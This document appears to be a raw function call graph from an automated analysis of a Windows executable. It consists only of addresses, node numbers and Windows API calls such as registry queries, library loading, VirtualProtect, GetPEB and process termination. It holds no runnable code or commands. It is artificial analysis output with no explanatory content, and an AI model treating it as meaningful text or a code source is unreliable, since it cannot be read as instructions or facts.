1b50bb ___scrt_is_nonwritable_in_current_image 97007->97008 97009 1b50c8 97008->97009 97010 1b50df 97008->97010 97031 1af2d9 20 API calls __dosmaperr 97009->97031 97023 1b2f5e EnterCriticalSection 97010->97023 97013 1b50cd 97032 1b27ec 26 API calls __fread_nolock 97013->97032 97015 1b5117 97033 1b513e LeaveCriticalSection _abort 97015->97033 97016 1b50d7 __fread_nolock 97016->96992 97019 1b50eb 97019->97015 97024 1b5000 97019->97024 97020->96995 97021->96998 97022->96996 97023->97019 97034 1b4c7d 97024->97034 97026 1b5012 97030 1b501f 97026->97030 97041 1b3405 11 API calls 2 library calls 97026->97041 97027 1b29c8 _free 20 API calls 97029 1b5071 97027->97029 97029->97019 97030->97027 97031->97013 97032->97016 97033->97016 97039 1b4c8a __dosmaperr 97034->97039 97035 1b4cca 97043 1af2d9 20 API calls __dosmaperr 97035->97043 97036 1b4cb5 RtlAllocateHeap 97037 1b4cc8 97036->97037 97036->97039 97037->97026 97039->97035 97039->97036 97042 1a4ead 7 API calls 2 library calls 97039->97042 97041->97026 97042->97039 97043->97037 97044->97005 97046 1a096c GetStartupInfoW 97045->97046 97046->96967 97047 18a0b88 97061 189e7d8 97047->97061 97049 18a0c18 97064 18a0a78 97049->97064 97067 18a1c48 GetPEB 97061->97067 97063 189ee63 97063->97049 97065 18a0a81 Sleep 97064->97065 97066 18a0a8f 97065->97066 97068 18a1c72 97067->97068 97068->97063 97069 18105b 97074 18344d 97069->97074 97071 18106a 97105 1a00a3 29 API calls __onexit 97071->97105 97073 181074 97075 18345d __wsopen_s 97074->97075 97076 18a961 22 API calls 97075->97076 97077 183513 97076->97077 97106 183a5a 97077->97106 97079 18351c 97113 183357 97079->97113 97086 18a961 22 API calls 97087 18354d 97086->97087 97134 18a6c3 97087->97134 97090 1c3176 RegQueryValueExW 97091 1c320c RegCloseKey 97090->97091 97092 1c3193 97090->97092 97095 183578 97091->97095 97100 1c321e _wcslen 97091->97100 97093 19fe0b 22 API calls 97092->97093 97094 1c31ac 97093->97094 97140 185722 97094->97140 97095->97071 97098 1c31d4 97099 186b57 22 API calls 97098->97099 97102 1c31ee ISource 97099->97102 97100->97095 97101 184c6d 22 API calls 97100->97101 97104 18515f 22 API calls 97100->97104 97143 189cb3 97100->97143 97101->97100 97102->97091 97104->97100 97105->97073 97149 1c1f50 97106->97149 97109 189cb3 22 API calls 97110 183a8d 97109->97110 97151 183aa2 97110->97151 97112 183a97 97112->97079 97114 1c1f50 __wsopen_s 97113->97114 97115 183364 GetFullPathNameW 97114->97115 97116 183386 97115->97116 97117 186b57 22 API calls 97116->97117 97118 1833a4 97117->97118 97119 1833c6 97118->97119 97120 1833dd 97119->97120 97121 1c30bb 97119->97121 97161 1833ee 97120->97161 97123 19fddb 22 API calls 97121->97123 97125 1c30c5 _wcslen 97123->97125 97124 1833e8 97128 18515f 97124->97128 97126 19fe0b 22 API calls 97125->97126 97127 1c30fe __fread_nolock 97126->97127 97129 18516e 97128->97129 97133 18518f __fread_nolock 97128->97133 97131 19fe0b 22 API calls 97129->97131 97130 19fddb 22 API calls 97132 183544 97130->97132 97131->97133 97132->97086 97133->97130 97135 18a6dd 97134->97135 97139 183556 RegOpenKeyExW 97134->97139 97136 19fddb 22 API calls 97135->97136 97137 18a6e7 97136->97137 97138 19fe0b 22 API calls 97137->97138 97138->97139 97139->97090 97139->97095 97141 19fddb 22 API calls 97140->97141 97142 185734 RegQueryValueExW 97141->97142 97142->97098 97142->97102 97144 189cc2 _wcslen 97143->97144 97145 19fe0b 22 API calls 97144->97145 97146 189cea __fread_nolock 97145->97146 97147 19fddb 22 API calls 97146->97147 97148 189d00 97147->97148 97148->97100 97150 183a67 GetModuleFileNameW 97149->97150 97150->97109 97152 1c1f50 __wsopen_s 97151->97152 97153 183aaf GetFullPathNameW 97152->97153 97154 183ae9 97153->97154 97155 183ace 97153->97155 97157 18a6c3 22 API calls 97154->97157 97156 186b57 22 API calls 97155->97156 97158 183ada 97156->97158 97157->97158 97159 1837a0 22 API calls 97158->97159 97160 183ae6 97159->97160 97160->97112 97162 1833fe _wcslen 97161->97162 97163 1c311d 97162->97163 97164 183411 97162->97164 97165 19fddb 22 API calls 97163->97165 97171 18a587 97164->97171 97168 1c3127 97165->97168 97167 18341e __fread_nolock 97167->97124 97169 19fe0b 22 API calls 97168->97169 97170 1c3157 __fread_nolock 97169->97170 97172 18a59d 97171->97172 97175 18a598 __fread_nolock 97171->97175 97173 19fe0b 22 API calls 97172->97173 97174 1cf80f 97172->97174 97173->97175 97175->97167 97176 18f7bf 97177 18f7d3 97176->97177 97178 18fcb6 97176->97178 97180 18fcc2 97177->97180 97181 19fddb 22 API calls 97177->97181 97270 18aceb 97178->97270 97182 18aceb 23 API calls 97180->97182 97183 18f7e5 97181->97183 97184 18fd3d 97182->97184 97183->97180 97183->97184 97185 18f83e 97183->97185 97280 1f1155 22 API calls 97184->97280 97202 18ed9d ISource 97185->97202 97211 191310 97185->97211 97188 19fddb 22 API calls 97209 18ec76 ISource 97188->97209 97189 18fef7 97196 18a8c7 22 API calls 97189->97196 97189->97202 97192 1d4600 97192->97202 97281 18a8c7 97192->97281 97193 1d4b0b 97286 1f359c 82 API calls __wsopen_s 97193->97286 97196->97202 97199 18a8c7 22 API calls 97199->97209 97200 18fbe3 97200->97202 97203 1d4bdc 97200->97203 97210 18f3ae ISource 97200->97210 97201 18a961 22 API calls 97201->97209 97287 1f359c 82 API calls __wsopen_s 97203->97287 97205 1a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97205->97209 97206 1d4beb 97288 1f359c 82 API calls __wsopen_s 97206->97288 97207 1a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97207->97209 97208 1a00a3 29 API calls pre_c_initialization 97208->97209 97209->97188 97209->97189 97209->97192 97209->97193 97209->97199 97209->97200 97209->97201 97209->97202 97209->97205 97209->97206 97209->97207 97209->97208 97209->97210 97268 1901e0 235 API calls 2 library calls 97209->97268 97269 1906a0 41 API calls ISource 97209->97269 97210->97202 97285 1f359c 82 API calls __wsopen_s 97210->97285 97212 1917b0 97211->97212 97213 191376 97211->97213 97428 1a0242 5 API calls __Init_thread_wait 97212->97428 97214 191390 97213->97214 97215 1d6331 97213->97215 97289 191940 97214->97289 97218 1d633d 97215->97218 97432 20709c 235 API calls 97215->97432 97218->97209 97220 1917ba 97222 1917fb 97220->97222 97224 189cb3 22 API calls 97220->97224 97226 1d6346 97222->97226 97228 19182c 97222->97228 97223 191940 9 API calls 97225 1913b6 97223->97225 97231 1917d4 97224->97231 97225->97222 97227 1913ec 97225->97227 97433 1f359c 82 API calls __wsopen_s 97226->97433 97227->97226 97251 191408 __fread_nolock 97227->97251 97230 18aceb 23 API calls 97228->97230 97232 191839 97230->97232 97429 1a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97231->97429 97430 19d217 235 API calls 97232->97430 97235 1d636e 97255 1d6369 97235->97255 97434 1f359c 82 API calls __wsopen_s 97235->97434 97236 19152f 97238 19153c 97236->97238 97239 1d63d1 97236->97239 97241 191940 9 API calls 97238->97241 97436 205745 54 API calls _wcslen 97239->97436 97242 191549 97241->97242 97246 1d64fa 97242->97246 97248 191940 9 API calls 97242->97248 97243 19fddb 22 API calls 97243->97251 97244 191872 97431 19faeb 23 API calls 97244->97431 97245 19fe0b 22 API calls 97245->97251 97246->97255 97437 1f359c 82 API calls __wsopen_s 97246->97437 97253 191563 97248->97253 97251->97232 97251->97235 97251->97236 97251->97243 97251->97245 97252 1d63b2 97251->97252 97251->97255 97403 18ec40 97251->97403 97435 1f359c 82 API calls __wsopen_s 97252->97435 97253->97246 97256 18a8c7 22 API calls 97253->97256 97258 1915c7 ISource 97253->97258 97255->97209 97256->97258 97257 191940 9 API calls 97257->97258 97258->97244 97258->97246 97258->97255 97258->97257 97260 19167b ISource 97258->97260 97299 20959f 97258->97299 97302 184f39 97258->97302 97308 1ed4ce 97258->97308 97311 20958b 97258->97311 97314 1ff0ec 97258->97314 97323 1f6ef1 97258->97323 97259 19171d 97259->97209 97260->97259 97427 19ce17 22 API calls ISource 97260->97427 97268->97209 97269->97209 97271 18acf9 97270->97271 97279 18ad2a ISource 97270->97279 97272 18ad55 97271->97272 97273 18ad01 ISource 97271->97273 97274 18a8c7 22 API calls 97272->97274 97272->97279 97275 1cfa48 97273->97275 97276 18ad21 97273->97276 97273->97279 97274->97279 97275->97279 98364 19ce17 22 API calls ISource 97275->98364 97277 1cfa3a VariantClear 97276->97277 97276->97279 97277->97279 97279->97180 97280->97202 97282 18a8ea __fread_nolock 97281->97282 97283 18a8db 97281->97283 97282->97202 97283->97282 97284 19fe0b 22 API calls 97283->97284 97284->97282 97285->97202 97286->97202 97287->97206 97288->97202 97290 191981 97289->97290 97294 19195d 97289->97294 97438 1a0242 5 API calls __Init_thread_wait 97290->97438 97292 19198b 97292->97294 97439 1a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97292->97439 97298 1913a0 97294->97298 97440 1a0242 5 API calls __Init_thread_wait 97294->97440 97295 198727 97295->97298 97441 1a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97295->97441 97298->97223 97442 207f59 97299->97442 97301 2095af 97301->97258 97303 184f43 97302->97303 97305 184f4a 97302->97305 97574 1ae678 97303->97574 97306 184f59 97305->97306 97307 184f6a FreeLibrary 97305->97307 97306->97258 97307->97306 97803 1edbbe lstrlenW 97308->97803 97312 207f59 120 API calls 97311->97312 97313 20959b 97312->97313 97313->97258 97315 187510 53 API calls 97314->97315 97316 1ff126 97315->97316 97808 189e90 97316->97808 97318 1ff136 97319 1ff15b 97318->97319 97320 18ec40 235 API calls 97318->97320 97322 1ff15f 97319->97322 97836 189c6e 22 API calls 97319->97836 97320->97319 97322->97258 97324 18a961 22 API calls 97323->97324 97325 1f6f1d 97324->97325 97326 18a961 22 API calls 97325->97326 97327 1f6f26 97326->97327 97328 1f6f3a 97327->97328 98042 18b567 39 API calls 97327->98042 97330 187510 53 API calls 97328->97330 97333 1f6f57 _wcslen 97330->97333 97331 1f70bf 97857 184ecb 97331->97857 97332 1f6fbc 97334 187510 53 API calls 97332->97334 97333->97331 97333->97332 97402 1f70e9 97333->97402 97336 1f6fc8 97334->97336 97340 18a8c7 22 API calls 97336->97340 97344 1f6fdb 97336->97344 97338 1f70e5 97339 18a961 22 API calls 97338->97339 97338->97402 97342 1f711a 97339->97342 97340->97344 97341 184ecb 94 API calls 97341->97338 97343 18a961 22 API calls 97342->97343 97347 1f7126 97343->97347 97345 1f7027 97344->97345 97348 1f7005 97344->97348 97351 18a8c7 22 API calls 97344->97351 97346 187510 53 API calls 97345->97346 97349 1f7034 97346->97349 97350 18a961 22 API calls 97347->97350 97352 1833c6 22 API calls 97348->97352 97353 1f703d 97349->97353 97354 1f7047 97349->97354 97355 1f712f 97350->97355 97351->97348 97356 1f700f 97352->97356 97357 18a8c7 22 API calls 97353->97357 98043 1ee199 GetFileAttributesW 97354->98043 97359 18a961 22 API calls 97355->97359 97360 187510 53 API calls 97356->97360 97357->97354 97363 1f7138 97359->97363 97361 1f701b 97360->97361 97364 186350 22 API calls 97361->97364 97362 1f7050 97365 1f7063 97362->97365 97368 184c6d 22 API calls 97362->97368 97366 187510 53 API calls 97363->97366 97364->97345 97367 187510 53 API calls 97365->97367 97374 1f7069 97365->97374 97369 1f7145 97366->97369 97370 1f70a0 97367->97370 97368->97365 97879 18525f 97369->97879 98044 1ed076 57 API calls 97370->98044 97373 1f7166 97921 184c6d 97373->97921 97374->97402 97377 1f71a9 97379 18a8c7 22 API calls 97377->97379 97378 184c6d 22 API calls 97380 1f7186 97378->97380 97381 1f71ba 97379->97381 97380->97377 97383 186b57 22 API calls 97380->97383 97924 186350 97381->97924 97385 1f719b 97383->97385 97387 186b57 22 API calls 97385->97387 97386 186350 22 API calls 97388 1f71d6 97386->97388 97387->97377 97389 186350 22 API calls 97388->97389 97390 1f71e4 97389->97390 97391 187510 53 API calls 97390->97391 97392 1f71f0 97391->97392 97933 1ed7bc 97392->97933 97394 1f7201 97395 1ed4ce 4 API calls 97394->97395 97396 1f720b 97395->97396 97397 187510 53 API calls 97396->97397 97401 1f7239 97396->97401 97398 1f7229 97397->97398 97987 1f2947 97398->97987 97400 184f39 68 API calls 97400->97402 97401->97400 97402->97258 97404 18ec76 ISource 97403->97404 97405 18fef7 97404->97405 97408 19fddb 22 API calls 97404->97408 97409 1d4600 97404->97409 97410 1d4b0b 97404->97410 97414 18a8c7 22 API calls 97404->97414 97417 1a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97404->97417 97418 18fbe3 97404->97418 97419 18a961 22 API calls 97404->97419 97421 1a00a3 29 API calls pre_c_initialization 97404->97421 97423 1d4beb 97404->97423 97424 1a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97404->97424 97425 18ed9d ISource 97404->97425 97426 18f3ae ISource 97404->97426 98358 1901e0 235 API calls 2 library calls 97404->98358 98359 1906a0 41 API calls ISource 97404->98359 97413 18a8c7 22 API calls 97405->97413 97405->97425 97408->97404 97415 18a8c7 22 API calls 97409->97415 97409->97425 98361 1f359c 82 API calls __wsopen_s 97410->98361 97413->97425 97414->97404 97415->97425 97417->97404 97420 1d4bdc 97418->97420 97418->97425 97418->97426 97419->97404 98362 1f359c 82 API calls __wsopen_s 97420->98362 97421->97404 98363 1f359c 82 API calls __wsopen_s 97423->98363 97424->97404 97425->97251 97426->97425 98360 1f359c 82 API calls __wsopen_s 97426->98360 97427->97260 97428->97220 97429->97222 97430->97244 97431->97244 97432->97218 97433->97255 97434->97255 97435->97255 97436->97253 97437->97255 97438->97292 97439->97294 97440->97295 97441->97298 97480 187510 97442->97480 97446 208281 97447 20844f 97446->97447 97451 20828f 97446->97451 97543 208ee4 60 API calls 97447->97543 97450 20845e 97450->97451 97452 20846a 97450->97452 97516 207e86 97451->97516 97468 207fd5 ISource 97452->97468 97453 187510 53 API calls 97469 208049 97453->97469 97458 2082c8 97531 19fc70 97458->97531 97461 208302 97538 1863eb 22 API calls 97461->97538 97462 2082e8 97537 1f359c 82 API calls __wsopen_s 97462->97537 97465 2082f3 GetCurrentProcess TerminateProcess 97465->97461 97466 208311 97539 186a50 22 API calls 97466->97539 97468->97301 97469->97446 97469->97453 97469->97468 97535 1e417d 22 API calls __fread_nolock 97469->97535 97536 20851d 42 API calls _strftime 97469->97536 97470 20832a 97479 208352 97470->97479 97540 1904f0 22 API calls 97470->97540 97472 2084c5 97472->97468 97476 2084d9 FreeLibrary 97472->97476 97473 208341 97541 208b7b 75 API calls 97473->97541 97476->97468 97478 18aceb 23 API calls 97478->97479 97479->97472 97479->97478 97542 1904f0 22 API calls 97479->97542 97544 208b7b 75 API calls 97479->97544 97481 187522 97480->97481 97482 187525 97480->97482 97481->97468 97503 208cd3 97481->97503 97483 18755b 97482->97483 97484 18752d 97482->97484 97485 1c50f6 97483->97485 97488 18756d 97483->97488 97495 1c500f 97483->97495 97545 1a51c6 26 API calls 97484->97545 97548 1a5183 26 API calls 97485->97548 97546 19fb21 51 API calls 97488->97546 97489 18753d 97492 19fddb 22 API calls 97489->97492 97490 1c510e 97490->97490 97494 187547 97492->97494 97496 189cb3 22 API calls 97494->97496 97497 1c5088 97495->97497 97498 19fe0b 22 API calls 97495->97498 97496->97481 97547 19fb21 51 API calls 97497->97547 97499 1c5058 97498->97499 97500 19fddb 22 API calls 97499->97500 97501 1c507f 97500->97501 97502 189cb3 22 API calls 97501->97502 97502->97497 97504 18aec9 22 API calls 97503->97504 97505 208cee CharLowerBuffW 97504->97505 97549 1e8e54 97505->97549 97509 18a961 22 API calls 97510 208d2a 97509->97510 97556 186d25 97510->97556 97512 208d3e 97513 1893b2 22 API calls 97512->97513 97515 208d48 _wcslen 97513->97515 97514 208e5e _wcslen 97514->97469 97515->97514 97569 20851d 42 API calls _strftime 97515->97569 97517 207ea1 97516->97517 97521 207eec 97516->97521 97518 19fe0b 22 API calls 97517->97518 97519 207ec3 97518->97519 97520 19fddb 22 API calls 97519->97520 97519->97521 97520->97519 97522 209096 97521->97522 97523 2092ab ISource 97522->97523 97530 2090ba _strcat _wcslen 97522->97530 97523->97458 97524 18b567 39 API calls 97524->97530 97525 18b38f 39 API calls 97525->97530 97526 18b6b5 39 API calls 97526->97530 97527 187510 53 API calls 97527->97530 97528 1aea0c 21 API calls ___std_exception_copy 97528->97530 97530->97523 97530->97524 97530->97525 97530->97526 97530->97527 97530->97528 97573 1eefae 24 API calls _wcslen 97530->97573 97532 19fc85 97531->97532 97533 19fd1d VirtualProtect 97532->97533 97534 19fceb 97532->97534 97533->97534 97534->97461 97534->97462 97535->97469 97536->97469 97537->97465 97538->97466 97539->97470 97540->97473 97541->97479 97542->97479 97543->97450 97544->97479 97545->97489 97546->97489 97547->97485 97548->97490 97551 1e8e74 _wcslen 97549->97551 97550 1e8f63 97550->97509 97550->97515 97551->97550 97554 1e8ea9 97551->97554 97555 1e8f68 97551->97555 97554->97550 97570 19ce60 41 API calls 97554->97570 97555->97550 97571 19ce60 41 API calls 97555->97571 97557 186d91 97556->97557 97558 186d34 97556->97558 97559 1893b2 22 API calls 97557->97559 97558->97557 97560 186d3f 97558->97560 97566 186d62 __fread_nolock 97559->97566 97561 1c4c9d 97560->97561 97562 186d5a 97560->97562 97563 19fddb 22 API calls 97561->97563 97572 186f34 22 API calls 97562->97572 97565 1c4ca7 97563->97565 97567 19fe0b 22 API calls 97565->97567 97566->97512 97568 1c4cda 97567->97568 97569->97514 97570->97554 97571->97555 97572->97566 97573->97530 97575 1ae684 ___scrt_is_nonwritable_in_current_image 97574->97575 97576 1ae6aa 97575->97576 97577 1ae695 97575->97577 97585 1ae6a5 __fread_nolock 97576->97585 97587 1a918d EnterCriticalSection 97576->97587 97604 1af2d9 20 API calls __dosmaperr 97577->97604 97579 1ae69a 97605 1b27ec 26 API calls __fread_nolock 97579->97605 97582 1ae6c6 97588 1ae602 97582->97588 97584 1ae6d1 97606 1ae6ee LeaveCriticalSection __fread_nolock 97584->97606 97585->97305 97587->97582 97589 1ae60f 97588->97589 97590 1ae624 97588->97590 97632 1af2d9 20 API calls __dosmaperr 97589->97632 97596 1ae61f 97590->97596 97607 1adc0b 97590->97607 97592 1ae614 97633 1b27ec 26 API calls __fread_nolock 97592->97633 97596->97584 97599 1ad955 __fread_nolock 26 API calls 97600 1ae646 97599->97600 97617 1b862f 97600->97617 97603 1b29c8 _free 20 API calls 97603->97596 97604->97579 97605->97585 97606->97585 97608 1adc1f 97607->97608 97609 1adc23 97607->97609 97613 1b4d7a 97608->97613 97609->97608 97610 1ad955 __fread_nolock 26 API calls 97609->97610 97611 1adc43 97610->97611 97634 1b59be 97611->97634 97614 1b4d90 97613->97614 97615 1ae640 97613->97615 97614->97615 97616 1b29c8 _free 20 API calls 97614->97616 97615->97599 97616->97615 97618 1b863e 97617->97618 97621 1b8653 97617->97621 97749 1af2c6 20 API calls __dosmaperr 97618->97749 97620 1b868e 97751 1af2c6 20 API calls __dosmaperr 97620->97751 97621->97620 97626 1b867a 97621->97626 97622 1b8643 97750 1af2d9 20 API calls __dosmaperr 97622->97750 97624 1b8693 97752 1af2d9 20 API calls __dosmaperr 97624->97752 97746 1b8607 97626->97746 97629 1b869b 97753 1b27ec 26 API calls __fread_nolock 97629->97753 97630 1ae64c 97630->97596 97630->97603 97632->97592 97633->97596 97635 1b59ca ___scrt_is_nonwritable_in_current_image 97634->97635 97636 1b59d2 97635->97636 97639 1b59ea 97635->97639 97713 1af2c6 20 API calls __dosmaperr 97636->97713 97638 1b5a88 97718 1af2c6 20 API calls __dosmaperr 97638->97718 97639->97638 97644 1b5a1f 97639->97644 97640 1b59d7 97714 1af2d9 20 API calls __dosmaperr 97640->97714 97643 1b5a8d 97719 1af2d9 20 API calls __dosmaperr 97643->97719 97659 1b5147 EnterCriticalSection 97644->97659 97647 1b5a95 97720 1b27ec 26 API calls __fread_nolock 97647->97720 97648 1b5a25 97650 1b5a41 97648->97650 97651 1b5a56 97648->97651 97715 1af2d9 20 API calls __dosmaperr 97650->97715 97660 1b5aa9 97651->97660 97654 1b59df __fread_nolock 97654->97608 97655 1b5a51 97717 1b5a80 LeaveCriticalSection __wsopen_s 97655->97717 97656 1b5a46 97716 1af2c6 20 API calls __dosmaperr 97656->97716 97659->97648 97661 1b5ad7 97660->97661 97699 1b5ad0 97660->97699 97662 1b5adb 97661->97662 97663 1b5afa 97661->97663 97728 1af2c6 20 API calls __dosmaperr 97662->97728 97666 1b5b4b 97663->97666 97667 1b5b2e 97663->97667 97664 1a0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97668 1b5cb1 97664->97668 97671 1b5b61 97666->97671 97734 1b9424 28 API calls __fread_nolock 97666->97734 97731 1af2c6 20 API calls __dosmaperr 97667->97731 97668->97655 97669 1b5ae0 97729 1af2d9 20 API calls __dosmaperr 97669->97729 97721 1b564e 97671->97721 97673 1b5b33 97732 1af2d9 20 API calls __dosmaperr 97673->97732 97675 1b5ae7 97730 1b27ec 26 API calls __fread_nolock 97675->97730 97680 1b5ba8 97686 1b5bbc 97680->97686 97687 1b5c02 WriteFile 97680->97687 97681 1b5b6f 97683 1b5b73 97681->97683 97684 1b5b95 97681->97684 97682 1b5b3b 97733 1b27ec 26 API calls __fread_nolock 97682->97733 97688 1b5c69 97683->97688 97735 1b55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 97683->97735 97736 1b542e 45 API calls 3 library calls 97684->97736 97691 1b5bf2 97686->97691 97692 1b5bc4 97686->97692 97690 1b5c25 GetLastError 97687->97690 97695 1b5b8b 97687->97695 97688->97699 97743 1af2d9 20 API calls __dosmaperr 97688->97743 97690->97695 97739 1b56c4 7 API calls 2 library calls 97691->97739 97696 1b5bc9 97692->97696 97697 1b5be2 97692->97697 97695->97688 97695->97699 97703 1b5c45 97695->97703 97696->97688 97701 1b5bd2 97696->97701 97738 1b5891 8 API calls 2 library calls 97697->97738 97699->97664 97737 1b57a3 7 API calls 2 library calls 97701->97737 97702 1b5c8e 97744 1af2c6 20 API calls __dosmaperr 97702->97744 97706 1b5c4c 97703->97706 97707 1b5c60 97703->97707 97740 1af2d9 20 API calls __dosmaperr 97706->97740 97742 1af2a3 20 API calls __dosmaperr 97707->97742 97708 1b5be0 97708->97695 97711 1b5c51 97741 1af2c6 20 API calls __dosmaperr 97711->97741 97713->97640 97714->97654 97715->97656 97716->97655 97717->97654 97718->97643 97719->97647 97720->97654 97722 1bf89b __fread_nolock 26 API calls 97721->97722 97723 1b565e 97722->97723 97724 1b5663 97723->97724 97745 1b2d74 38 API calls 3 library calls 97723->97745 97724->97680 97724->97681 97726 1b5686 97726->97724 97727 1b56a4 GetConsoleMode 97726->97727 97727->97724 97728->97669 97729->97675 97730->97699 97731->97673 97732->97682 97733->97699 97734->97671 97735->97695 97736->97695 97737->97708 97738->97708 97739->97708 97740->97711 97741->97699 97742->97699 97743->97702 97744->97699 97745->97726 97754 1b8585 97746->97754 97748 1b862b 97748->97630 97749->97622 97750->97630 97751->97624 97752->97629 97753->97630 97755 1b8591 ___scrt_is_nonwritable_in_current_image 97754->97755 97765 1b5147 EnterCriticalSection 97755->97765 97757 1b859f 97758 1b85d1 97757->97758 97759 1b85c6 97757->97759 97781 1af2d9 20 API calls __dosmaperr 97758->97781 97766 1b86ae 97759->97766 97762 1b85cc 97782 1b85fb LeaveCriticalSection __wsopen_s 97762->97782 97764 1b85ee __fread_nolock 97764->97748 97765->97757 97783 1b53c4 97766->97783 97768 1b86c4 97796 1b5333 21 API calls 2 library calls 97768->97796 97770 1b86be 97770->97768 97773 1b53c4 __wsopen_s 26 API calls 97770->97773 97780 1b86f6 97770->97780 97771 1b53c4 __wsopen_s 26 API calls 97774 1b8702 CloseHandle 97771->97774 97772 1b871c 97775 1b873e 97772->97775 97797 1af2a3 20 API calls __dosmaperr 97772->97797 97776 1b86ed 97773->97776 97774->97768 97777 1b870e GetLastError 97774->97777 97775->97762 97779 1b53c4 __wsopen_s 26 API calls 97776->97779 97777->97768 97779->97780 97780->97768 97780->97771 97781->97762 97782->97764 97784 1b53d1 97783->97784 97785 1b53e6 97783->97785 97798 1af2c6 20 API calls __dosmaperr 97784->97798 97789 1b540b 97785->97789 97800 1af2c6 20 API calls __dosmaperr 97785->97800 97788 1b53d6 97799 1af2d9 20 API calls __dosmaperr 97788->97799 97789->97770 97790 1b5416 97801 1af2d9 20 API calls __dosmaperr 97790->97801 97793 1b53de 97793->97770 97794 1b541e 97802 1b27ec 26 API calls __fread_nolock 97794->97802 97796->97772 97797->97775 97798->97788 97799->97793 97800->97790 97801->97794 97802->97793 97804 1edbdc GetFileAttributesW 97803->97804 97805 1ed4d5 97803->97805 97804->97805 97806 1edbe8 FindFirstFileW 97804->97806 97805->97258 97806->97805 97807 1edbf9 FindClose 97806->97807 97807->97805 97837 186270 97808->97837 97810 189fd2 97843 18a4a1 97810->97843 97812 189fec 97812->97318 97815 18a6c3 22 API calls 97835 189eb5 97815->97835 97816 1cf7c4 97855 1e96e2 84 API calls __wsopen_s 97816->97855 97817 1cf699 97823 19fddb 22 API calls 97817->97823 97819 18a405 97819->97812 97856 1e96e2 84 API calls __wsopen_s 97819->97856 97822 1cf7d2 97825 18a4a1 22 API calls 97822->97825 97824 1cf754 97823->97824 97827 19fe0b 22 API calls 97824->97827 97826 1cf7e8 97825->97826 97826->97812 97828 18a12c __fread_nolock 97827->97828 97828->97816 97828->97819 97830 18a587 22 API calls 97830->97835 97831 18a4a1 22 API calls 97831->97835 97832 18aec9 22 API calls 97833 18a0db CharUpperBuffW 97832->97833 97851 18a673 22 API calls 97833->97851 97835->97810 97835->97815 97835->97816 97835->97817 97835->97819 97835->97828 97835->97830 97835->97831 97835->97832 97842 184573 41 API calls _wcslen 97835->97842 97852 1848c8 23 API calls 97835->97852 97853 1849bd 22 API calls __fread_nolock 97835->97853 97854 18a673 22 API calls 97835->97854 97836->97322 97838 19fe0b 22 API calls 97837->97838 97839 186295 97838->97839 97840 19fddb 22 API calls 97839->97840 97841 1862a3 97840->97841 97841->97835 97842->97835 97844 18a52b 97843->97844 97845 18a4b1 __fread_nolock 97843->97845 97848 19fe0b 22 API calls 97844->97848 97846 19fddb 22 API calls 97845->97846 97847 18a4b8 97846->97847 97849 18a4d6 97847->97849 97850 19fddb 22 API calls 97847->97850 97848->97845 97849->97812 97850->97849 97851->97835 97852->97835 97853->97835 97854->97835 97855->97822 97856->97812 98045 184e90 LoadLibraryA 97857->98045 97862 1c3ccf 97864 184f39 68 API calls 97862->97864 97863 184ef6 LoadLibraryExW 98053 184e59 LoadLibraryA 97863->98053 97866 1c3cd6 97864->97866 97868 184e59 3 API calls 97866->97868 97870 1c3cde 97868->97870 98075 1850f5 97870->98075 97871 184f20 97871->97870 97872 184f2c 97871->97872 97874 184f39 68 API calls 97872->97874 97875 184f31 97874->97875 97875->97338 97875->97341 97878 1c3d05 97880 18a961 22 API calls 97879->97880 97881 185275 97880->97881 97882 18a961 22 API calls 97881->97882 97883 18527d 97882->97883 97884 18a961 22 API calls 97883->97884 97885 185285 97884->97885 97886 18a961 22 API calls 97885->97886 97887 18528d 97886->97887 97888 1c3df5 97887->97888 97889 1852c1 97887->97889 97890 18a8c7 22 API calls 97888->97890 97891 186d25 22 API calls 97889->97891 97892 1c3dfe 97890->97892 97893 1852cf 97891->97893 97894 18a6c3 22 API calls 97892->97894 97895 1893b2 22 API calls 97893->97895 97897 185304 97894->97897 97896 1852d9 97895->97896 97896->97897 97898 186d25 22 API calls 97896->97898 97899 185325 97897->97899 97913 185349 97897->97913 97920 1c3e20 97897->97920 97901 1852fa 97898->97901 97903 184c6d 22 API calls 97899->97903 97899->97913 97900 186d25 22 API calls 97904 18535a 97900->97904 97902 1893b2 22 API calls 97901->97902 97902->97897 97907 185332 97903->97907 97906 185370 97904->97906 97909 18a8c7 22 API calls 97904->97909 97905 185384 97910 18538f 97905->97910 97914 18a8c7 22 API calls 97905->97914 97906->97905 97911 18a8c7 22 API calls 97906->97911 97912 186d25 22 API calls 97907->97912 97907->97913 97908 186b57 22 API calls 97917 1c3ee0 97908->97917 97909->97906 97915 18a8c7 22 API calls 97910->97915 97918 18539a 97910->97918 97911->97905 97912->97913 97913->97900 97914->97910 97915->97918 97916 184c6d 22 API calls 97916->97917 97917->97913 97917->97916 98203 1849bd 22 API calls __fread_nolock 97917->98203 97918->97373 97920->97908 97922 18aec9 22 API calls 97921->97922 97923 184c78 97922->97923 97923->97377 97923->97378 97925 186362 97924->97925 97926 1c4a51 97924->97926 98204 186373 97925->98204 98214 184a88 22 API calls __fread_nolock 97926->98214 97929 18636e 97929->97386 97930 1c4a5b 97931 1c4a67 97930->97931 97932 18a8c7 22 API calls 97930->97932 97932->97931 97934 1ed7d8 97933->97934 97935 1ed7dd 97934->97935 97936 1ed7f3 97934->97936 97939 18a8c7 22 API calls 97935->97939 97986 1ed7ee 97935->97986 97937 18a961 22 API calls 97936->97937 97938 1ed7fb 97937->97938 97940 18a961 22 API calls 97938->97940 97939->97986 97941 1ed803 97940->97941 97942 18a961 22 API calls 97941->97942 97943 1ed80e 97942->97943 97944 18a961 22 API calls 97943->97944 97945 1ed816 97944->97945 97946 18a961 22 API calls 97945->97946 97947 1ed81e 97946->97947 97948 18a961 22 API calls 97947->97948 97949 1ed826 97948->97949 97950 18a961 22 API calls 97949->97950 97951 1ed82e 97950->97951 97952 